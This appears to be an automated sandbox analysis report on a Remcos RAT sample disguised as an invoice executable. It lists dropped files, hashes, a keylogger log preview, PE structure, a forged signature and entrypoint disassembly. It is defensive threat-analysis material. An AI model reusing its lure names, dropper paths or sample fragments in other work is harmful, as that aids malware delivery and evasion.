                                                                                                                                                                                                                    Preview:i.......................(q...K...........`....5..-s..........j.....@.Z......b.................-...~..7...\....=.,...rN.m...o.`...........5x....I.....g........K..].....@......J..T..'.HX.(.........:'...qD..............D..g.!.Q.`..I....m.....c...W..W..B.Y.........=..&......................T..3...._.....................n..............S....(...........6......6................R..........~....8.......Dr.....&%B....P..2.............aS-...~............I............!..p:.....}:....y....Qq.....w.K.=..............N./....................O....)x....|...,.....&...H.......................".M.........n....>.H................*I.....L."...)..f..........R..K...!.............7.V.X...m.Z.:.P..........T.....W\..h...............0.. .&...l......f......................6............_.........v....2'.....i..f..'................O..............5.9.....)....0..?.............,.F..............G..1..J...E.m.d...F.2.'...........Z..W....(.......|Q+.........1....&........J~.......|.w.x.....................S....

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Admonishment64\Unconspicuousness\Brugeraktionernes\Annonceafdelingen\bargees.sta

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65697
                                                                                                                                                                                                                    Entropy (8bit):4.931395567400519
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:QH2elU0SE5tqdyzDKhH5/K77FT8hQWJcpj7hjOnGMgHTTWAo1v5sb3dSn4cAF4VI:7qrt0hcHFw6pjlJnzmsTdSNzC8DAR9
                                                                                                                                                                                                                    MD5:EDCBC056E7C101CE437DF45FE03B30B5
                                                                                                                                                                                                                    SHA1:2265E3B7E4BB1B14D43740F0F93C67EE0DDCA792
                                                                                                                                                                                                                    SHA-256:3915AD2806B97D2EC41A8E9EF8235339458E4821A26A532B77F228820BF3CF7E
                                                                                                                                                                                                                    SHA-512:08583F6BCA6564938CC02BD612FA201D1C0E9253B9D2F3F247C36A7DDF2CEA3A0BF37190657A5630ABD140169A7FEF3547765AEBAB253ABC5D73B1B8A17439AD
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....+NXR.........Z..j...;...J.q.....aT.P............gA..*.J..s......:......Y...\......t.Q........a....?................................r....N.....!.B..:.o.....v.............4}..m..._Y.....\.....%...................c...3.........Er.......[.......B......y...,F............d........m.e..........P.*..........'..\.......B.q.i.j..........I.!........;...[.X..........X.u......].J.J..............Y.v.2....S. ......4...}.X...A.(....'...........:..P..........p.......<.. ......."...........~...p.............sT...........p.....#...............M.Q.W...m...........K./..B...s..... ......Go............|....Z........tJ.........U.I...K....r..+.......:.^.#A.2..............i.........v......9......M........].........q...........f.....4.<....6....E.....a,.....c.Z...............:..........8.....3..\@.......... .....&[.,......?.......{=..~Cm!..s....0..........y.........|Q.V............]............Qx....CZ.Z...T............z:..............6...........bWGd...!r.U...7.Q..q..$.}<{....Z.....%.............

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Admonishment64\statshusmanden\Magnetohydrodynamically30\Baadsmandspibers\touristdom.ban

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):29189
                                                                                                                                                                                                                    Entropy (8bit):4.945454516062807
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:1ojOYOF4MsLp5sO5pkv1esokFzIsCuVyFMydx:1oiYCG5sO5pohobFFM4x
                                                                                                                                                                                                                    MD5:CD3BA17103577BDFD416767D3BDDE150
                                                                                                                                                                                                                    SHA1:816C9D16226C19ED40D84CE5A797EA813ED66AF0
                                                                                                                                                                                                                    SHA-256:847D59B3FB55AEBA320DCEEACB7E10F980DBCB0F9141B44CF71D47BB910581CE
                                                                                                                                                                                                                    SHA-512:C0A29AD1783442E1020F40F92A1E7D81A328F2ABBB0968B735309EF97C1BE93A1BAABA69A1057FF54F68EF9B6C356D8227463A1DF74A2474984BE629136EB38F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.............k...%..2.B........ S.3..........[.......l.....i.........V....B.m,....f.,..X.s......g..S..................,...M.....G.........x.7.c#..............x.F..CF9....GN..b..........X...5...+.....M....^...E...........d........q.o....x..V.....5..GP1.........C...2-... ......,........j.....~{.2.......".W....*...+......(.W........57....R8 ....>I.......S....R.R..)...EYf........8.........c9...,.T..>.B...._V.....%...........h.K......T...R...:.K..Z.C..;...........y"......^c(....7.f........8...t.....(..Q.....Q.........(..9M...(..Q.........A...............#......E.....s.E.J.a.....e......s....c...V...S..9...T.;............g...........d.o......<...........E..........."..&..z........'...6....JA.........`.....K.........V.......M.......Ot.......^d..$p...........1............sI.............&.............7....-.......wz..IB......m....o........Z.........g...............Z=...qJGGx...y.t. N...................n.............9........q..r.........u.<.......y..0...........Z.[.o.. ..............

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\json[1].json

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):958
                                                                                                                                                                                                                    Entropy (8bit):5.008577355703137
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:tkECnd6UGkMyGWKyMPVGADTogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7Lpm9J7:qNdVauKyM8fvXhNlT3/7SxDWro
                                                                                                                                                                                                                    MD5:DB0D0EA888098BDE439EC884726D3F1D
                                                                                                                                                                                                                    SHA1:C0BFF52E1ED25232E2BDECB8BB899EBB06F50372
                                                                                                                                                                                                                    SHA-256:860B8A39E3466699C50AF0A08BEE2945923344D56906585EDDA9E55FE0020B75
                                                                                                                                                                                                                    SHA-512:3DF7E59DD131E97E0773BA18F11A0F20F965D77CE31D13DCC0FEC99A0D9DCD40276635AFC3EED181F7FC7BADC9A63A28A30F0465486AC7673F3F81695E9FC4E2
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:{. "geoplugin_request":"102.129.153.223",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exe

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1091672
                                                                                                                                                                                                                    Entropy (8bit):7.182329229415893
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:Ec0xoWbGGh7p/pMSC8grbTQJy4Uwjh5orvRNDRDVu4YT9vZTWbay6spuxv:Ec0xoWNh7pnd6Pey4dXor3D+DWK/v
                                                                                                                                                                                                                    MD5:195787F942427352DB785FEA42C93F43
                                                                                                                                                                                                                    SHA1:11349F0AA5059663C99BDDB4B1D4925B0795D4C0
                                                                                                                                                                                                                    SHA-256:4957FB0FAA66FA85BD02E198C98D741A6EDF5F683538601BBC7099F88AA4AC30
                                                                                                                                                                                                                    SHA-512:B12DF24DFF447CEC94123248D5D3B9619F7A2D4EBBF21EE42B8BEEDCEA471D9D6B92DDD0E580E29E506B472E8670F6F430DFAA4959E479EA82B9E269FF694AE4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...5.oZ.................f...*.......4............@..................................c....@.............................................p...........(...0"...........................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...X............~..............@....ndata...@...............................rsrc...p...........................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhv3A27.tmp

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb549b277, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):41943040
                                                                                                                                                                                                                    Entropy (8bit):1.3203849010710336
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24576:wPzACerDZp9643tPAfY9MkrvUXaYLwumVzPDQgGEqg9joAag/JF7svghu2w0lfoC:prDZpdSfY9lgiPDQgGWXu2
                                                                                                                                                                                                                    MD5:69B0753047EA2B40463C2E6BA11F08B2
                                                                                                                                                                                                                    SHA1:BA5DCB99027D79444BC8D7064811E17364CFFE6E
                                                                                                                                                                                                                    SHA-256:06C2306A5B8D180969FD2F66C689A75126F57E519DD77852AEC73A21478886AC
                                                                                                                                                                                                                    SHA-512:5AEE6D11CB52473098CC9A07DC0B966CE8CFB396C391FD744FA4A74EC27E46D403DACC71F401A7E8FFE49C1FF2AF1059D4A0BAAA690734A357FD76582AF5BA86
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.I.w... ....................*...y........................2.@........{}.6....{..h.4.@.........................Be ....y7.........................................................................................................bJ......n...............................................................@...@....................................... ............{..............................................................@...........................................................................................................................N...:....y!.................................e.{.6....{.B..................*.6....{..................@........#......h.4.@...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ixfof

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):11776
                                                                                                                                                                                                                    Entropy (8bit):5.890541747176257
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                                                                                                                                                    MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                                                                                                                                                    SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                                                                                                                                                    SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                                                                                                                                                    SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: LATG_HWWYTYRERWRWR39670034Kvstelsernes.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: LATG_HWWYTYRERWRWR39670034Kvstelsernes.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: SecuriteInfo.com.Win32.Malware-gen.10191.7591.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: SecuriteInfo.com.Win32.Malware-gen.10191.7591.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: ZH-SA_5012023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: ZH-SA_5012023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: SirtakiQuote No 104-346.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: 2023.10.11.59363PR69186_1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: 2023.10.11.59363PR69186_1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: CMR_PL7858345353_1_FB-LK_1025_WDF44770313563801.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: CMR_PL7858345353_1_FB-LK_1025_WDF44770313563801.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: SirtakiQuote_No_104-346.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: SirtakiQuote_No_104-346.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: 000299288171.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: 000299288171.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: BR1498-23.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: BR1498-23.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: vxJjLEvhQU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: SYZMMfgqPs.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nspD5E0.tmp

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):973779
                                                                                                                                                                                                                    Entropy (8bit):5.927333930668618
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:Wevg8/6UBWFzUG3Vhy20DfInqInHitcVFeVZE5eEqmWQO32kVeQf8k3Fgs5r/cBd:lwVgrDoJBHeMOQmf5XV8oKcEz
                                                                                                                                                                                                                    MD5:8019DF65EECA9EF545AA6BB362A06661
                                                                                                                                                                                                                    SHA1:0E07BF06FD7C2B7AF9B44D9229859BE434496513
                                                                                                                                                                                                                    SHA-256:AECE698E2E4DB708DE27094B2B63B51C31CDD4A113FE87760AFA0D25E5EF74EF
                                                                                                                                                                                                                    SHA-512:9757AB44237B40E28538E8E0D33C0467D0FD83E69CEF29E9371640EBE5FE81CEBD04E4220E40F3ABEDD8969EC3BA57F00042537860FC1EC859ED3687E91944DC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.1......,.......,.......D................0.......1......................................................................................s...................................................................................................................................................G...J...........L...h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\paqlgkfs.dat

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):416
                                                                                                                                                                                                                    Entropy (8bit):3.4077018216873105
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:KlrlxkuecmlrlxkJAbWFe5ElrlxkD8lrlxkObWItN25MMl:+36cS3hWqM3B3RWIt/Ml
                                                                                                                                                                                                                    MD5:75CC3535E18C38DFAD07C94305583855
                                                                                                                                                                                                                    SHA1:E254844EDC32CAFE2C4A70C6337B35261D52BA3A
                                                                                                                                                                                                                    SHA-256:34A21B6CF5538C73DBC52605C36D15C791D8D2EB04572835E09629D3B2457CF3
                                                                                                                                                                                                                    SHA-512:C83D442A518A0829F7E17512F994F4629DD0C75FC893FDC2206B15D69A5F2802B1B852F884B5B8C435F5090CB38C3AC39ADAB6031E3E62146BD4E897BCC61273
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
                                                                                                                                                                                                                    Preview:....[.2.0.2.3./.1.0./.3.1. .1.3.:.1.9.:.5.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.3./.1.0./.3.1. .1.3.:.1.9.:.5.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.3./.1.0./.3.1. .1.3.:.2.0.:.0.1. .R.u.n.].........[.2.0.2.3./.1.0./.3.1. .1.3.:.2.0.:.0.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....

                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                    Entropy (8bit):7.182329229415893
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                    File name:18001787_down_payment_invoice_90002104.exe
                                                                                                                                                                                                                    File size:1'091'672 bytes
                                                                                                                                                                                                                    MD5:195787f942427352db785fea42c93f43
                                                                                                                                                                                                                    SHA1:11349f0aa5059663c99bddb4b1d4925b0795d4c0
                                                                                                                                                                                                                    SHA256:4957fb0faa66fa85bd02e198c98d741a6edf5f683538601bbc7099f88aa4ac30
                                                                                                                                                                                                                    SHA512:b12df24dff447cec94123248d5d3b9619f7a2d4ebbf21ee42b8beedcea471d9d6b92ddd0e580e29e506b472e8670f6f430dfaa4959e479ea82b9e269ff694ae4
                                                                                                                                                                                                                    SSDEEP:12288:Ec0xoWbGGh7p/pMSC8grbTQJy4Uwjh5orvRNDRDVu4YT9vZTWbay6spuxv:Ec0xoWNh7pnd6Pey4dXor3D+DWK/v
                                                                                                                                                                                                                    TLSH:71350880E2049A66ECC71FB3D83BDC725427BE6C4978871D255F772A1AF334610BAE49
                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...5.oZ.................f...*.....

                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                    Icon Hash:327393a3b595a3a1

                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Entrypoint:0x4034a5
                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                    Time Stamp:0x5A6FED35 [Tue Jan 30 03:57:41 2018 UTC]
                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                    Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9

                                                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                    Signature Issuer:E=Emphatical@Unensouled.To, OU="Synoviparous Industriministeriet ", O=Pothooks, L=Correll, S=Minnesota, C=US
                                                                                                                                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                    Error Number:-2146762487
                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                    • 09/05/2023 08:00:43 08/05/2026 08:00:43
                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                    • E=Emphatical@Unensouled.To, OU="Synoviparous Industriministeriet ", O=Pothooks, L=Correll, S=Minnesota, C=US
                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                    Thumbprint MD5:98D4FC1058B808ACA6046A03B4DE85BF
                                                                                                                                                                                                                    Thumbprint SHA-1:7BB3BCF15AF20DFC1C555C628764E94B289BF5F4
                                                                                                                                                                                                                    Thumbprint SHA-256:AD53F62DFFB399583ECB4422D32EE85F8A7AAE21B0ACB35BF1E35EDABF62F3F0
                                                                                                                                                                                                                    Serial:47D6D5313599E408790BB633E75A84AAC3D3E43F

                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                    pop edi
                                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                    mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                    call dword ptr [004080ACh]
                                                                                                                                                                                                                    call dword ptr [004080A8h]
                                                                                                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                                                                                    mov dword ptr [0042A24Ch], eax
                                                                                                                                                                                                                    je 00007F7BFCA7CB13h
                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                    call 00007F7BFCA7FDDDh
                                                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                                                    je 00007F7BFCA7CB09h
                                                                                                                                                                                                                    push 00000C00h
                                                                                                                                                                                                                    call eax
                                                                                                                                                                                                                    mov esi, 004082B0h
                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                    call 00007F7BFCA7FD57h
                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                    call dword ptr [00408150h]
                                                                                                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                    cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                    jne 00007F7BFCA7CAECh
                                                                                                                                                                                                                    push 0000000Ah
                                                                                                                                                                                                                    call 00007F7BFCA7FDB0h
                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                    call 00007F7BFCA7FDA9h
                                                                                                                                                                                                                    push 00000006h
                                                                                                                                                                                                                    mov dword ptr [0042A244h], eax
                                                                                                                                                                                                                    call 00007F7BFCA7FD9Dh
                                                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                                                    je 00007F7BFCA7CB11h
                                                                                                                                                                                                                    push 0000001Eh
                                                                                                                                                                                                                    call eax
                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                    je 00007F7BFCA7CB09h
                                                                                                                                                                                                                    or byte ptr [0042A24Fh], 00000040h
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                    call dword ptr [004082A0h]
                                                                                                                                                                                                                    mov dword ptr [0042A318h], eax
                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                    push 004216E8h
                                                                                                                                                                                                                    call dword ptr [00408188h]
                                                                                                                                                                                                                    push 0040A384h

                                                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x5df70.rsrc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1086280x2230
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                    .text0x10000x64090x6600False0.6540287990196079data6.416222666400958IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .rdata0x80000x138e0x1400False0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .data0xa0000x203580x600False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .ndata0x2b0000x240000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .rsrc0x4f0000x5df700x5e000False0.04252462184175532data4.065325004462114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
